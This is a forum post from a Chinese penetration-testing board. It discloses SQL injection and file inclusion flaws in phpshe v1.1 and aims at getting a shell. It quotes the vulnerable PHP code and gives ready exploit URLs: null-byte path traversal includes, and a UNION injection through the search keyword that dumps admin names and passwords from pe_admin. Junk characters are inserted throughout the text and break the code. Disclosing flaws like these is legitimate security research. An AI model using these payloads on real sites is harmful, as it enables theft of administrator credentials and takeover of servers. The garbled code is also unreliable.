找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
返回列表 发新帖
查看: 3068|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/, Z2 _+ V, }, G; t
/* Phpshe v1.1 Vulnerability7 [' p' i. W6 R7 D; ?, M5 {9 o
/* ========================
+ B1 t' c* N: m- D2 e/* By: : Kn1f3
( V+ y3 \4 T  Y9 w' x4 y; ?; F( e, y8 d/* E-Mail : 681796@qq.com- Q% R* k6 G$ j5 I' n
/*******************************************************/- _  u0 {, `* E  d6 ]# @$ f' t) r
0×00 整体大概参数传输1 Y6 d( h0 B/ K' t. V- R3 G
$ R/ g) t6 j0 {3 T, m* z

7 ^, k5 V# i: W# c, _' p5 @
* }  c; ~4 j- M( ]. a7 ^8 j3 Y//common.php" x' _4 C' {! b) L) w1 G
if (get_magic_quotes_gpc()) {8 z/ {; h8 j9 o4 U$ ~
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
) Q2 I0 N) b; ~6 J+ l! o!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
. |# s1 `& n0 e}& K; [, h  ~  E& W
else {8 G" ?- _0 l) r
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
1 ^2 k- I/ m- H; b" i0 N4 ~!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
6 A7 r8 k. _( I' S; T9 o}3 n" t* {7 O7 d9 C
session_start();+ @( y- O; A- w! z
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
4 c& U3 m* g, |!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');6 U+ y7 R1 ^7 S0 ]& Y7 D2 R

# @, P8 \& X* t9 C) }! ?0×01 包含漏洞' s; d1 ^3 @  z4 u: K: E3 j

- |, c  g  q; b5 @2 j; q* Z8 R# v, z. u4 c
//首页文件
. m  Z0 x8 h# d1 y0 S: n; k<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);$ @6 M4 X+ g. a2 ?5 u& g) F7 A" ?
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞/ ~" N& H/ S5 U( U. W4 E4 v( h! R
pe_result();
; A. k/ y' r1 e1 O1 i" z?>0 {2 O# n; s2 m6 Z  P
//common 文件 第15行开始
# f! ~2 z- P' o- t( F' q1 ~8 gurl路由配置# q2 m9 m4 i& Y$ b% u# g
$module = $mod = $act = 'index';$ x% T$ \4 B4 p6 m
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);( m6 V' j3 A( ?" b8 q) ~
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
% i0 U1 D% e6 f/ D$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);; S) v; k" ?% Z( U
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00+ i6 A; I1 g1 v8 }5 J) W+ P

8 v& e; i- A( k# R& m. s

0 b! Q1 F; d, p 0×02 搜索注入% d: z2 @' X5 Y/ v
- X5 }& L7 V$ b4 o
<code id="code2">

//product.php文件
* n# F+ s0 l2 ]case 'list':
/ R' n% H2 J* j6 @! B$category_id = intval($id);+ a- f8 A# M: F" o& p% ~& S1 b: c# x
$info = $db->pe_select('category', array('category_id'=>$category_id));
3 V4 p* d! p% E1 {* K% Y, Q. O//搜索7 z2 g. F3 |7 Y- K4 ~& R
$sqlwhere = " and `product_state` = 1";" y; J/ R+ d% t9 l
pe_lead('hook/category.hook.php');8 H+ ~) t& w$ G0 E
if ($category_id) {" J/ n/ z( P% v) p
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";( j6 P: L# N* ^# _# j8 s
}
" c9 y7 Q1 h7 K# \* Q! k0 H# N$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤; R/ }5 ~# b& A" S% O
if ($_g_orderby) {, ^: H; T+ w% g+ n8 ]4 s% f4 z
$orderby = explode('_', $_g_orderby);
6 V. ^( ~2 N! ~# x$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";+ E# H9 c/ R( k6 c3 Q
}
4 O6 ^1 I. e& T+ r- o7 \) N6 welse {
9 \& s' Y; I! k) i7 b$ R: }$sqlwhere .= " order by `product_id` desc";
0 D% n1 h+ U. l/ h}; X% T6 y6 v0 ]) J; C8 {0 w
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
! G/ U- B+ A' f5 T6 U2 A//热卖排行. D; B0 m3 |9 z/ G. u+ C$ G
$product_hotlist = product_hotlist();
3 @0 o; x3 B$ U//当前路径  s- q. C0 ?: z
$nowpath = category_path($category_id);3 A" H- M6 g; Q5 {; t! ^
$seo = pe_seo($info['category_name']);
, W2 _( j! b8 G) g& ?) \include(pe_tpl('product_list.html'));4 C4 e% ?  w/ h6 f
//跟进selectall函数库
7 @  t, l  b) @public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())) W- v: R' i5 W9 E; E
{7 ^1 f8 \4 Y: I! {: ]
//处理条件语句
% B0 S* W4 \$ d9 }- c+ H$sqlwhere = $this->_dowhere($where);
# _4 R4 b5 [; |! _return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
8 ~: r7 e( l( r, Z' e: k: }}
2 f2 @; u8 }  X1 e6 y6 P. h2 B/ S//exp2 V) \: g' K7 }8 q2 d/ R8 H
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
. p! f, u: R  c) m6 @

</code>
: _0 E! d* R" H- r; U+ [- D% z
  F' B% {# j( u4 @0×03 包含漏洞2
- }4 W5 z9 {3 u: D1 ` . M8 M9 [4 U8 n- y) s4 i* s
<code id="code3">

//order.php

case 'pay':

3 B/ u4 w) Q$ [6 {
$order_id = pe_dbhold($_g_id);

* S. L! D6 M+ l9 |2 |
$cache_payway = cache::get('payway');


; D, l3 z  R' ]foreach($cache_payway as $k => $v) {

, L- k6 e" {3 Q. }7 }
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


& I5 ?8 n8 s8 o7 z" j4 r  _if ($k == 'bank') {

  Q+ e- X- T4 c1 k
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


0 K, B! @% N5 B! W}


/ j) z$ B! E3 B1 w+ k" c' x7 C+ t}

. R' m8 E% g$ S% d, t, T' b+ W
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


' A% p3 p. P9 n3 ?2 c!$order['order_id'] && pe_error('订单号错误...');

. S9 V3 Y' k6 I) k3 z* X+ O+ z
if (isset($_p_pesubmit)) {

3 s* N4 o' U( B7 n# W! i3 v9 _0 [2 N, W
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


, q  e" N' ?( f- R0 X/ q$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

* j: G) ^1 N4 O9 u8 G0 V5 |
foreach ($info_list as $v) {


" S& |: w2 R- ?# N: h1 q! ^$order['order_name'] .= "{$v['product_name']};";
1 a- |) M; B( W# ?9 U1 s


$ M: @5 @, m% K: K9 Q" q}

4 A! t1 ]% h, i6 b; A9 I
echo '正在为您连接支付网站,请稍后...';


+ f) k7 y) |0 a. Hinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


& @' E% Z2 q9 U}//当一切准备好的时候就可以进行"鸡肋包含了"

3 }; B" q7 |; c- Z
else {


. M# ]& W3 `. J/ l6 t3 u* Hpe_error('支付错误...');

/ E+ B9 `+ V3 g1 j; U- S4 R
}


# H& f9 y8 K) P0 {  |3 |3 |}

+ Y. L9 i9 O# Y6 d3 p
$seo = pe_seo('选择支付方式');

5 z- C% p% K, }+ {; U
include(pe_tpl('order_pay.html'));


' ]0 p. C# ]. N2 U. X, U$ Bbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
. v. u- n; I8 N( O

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表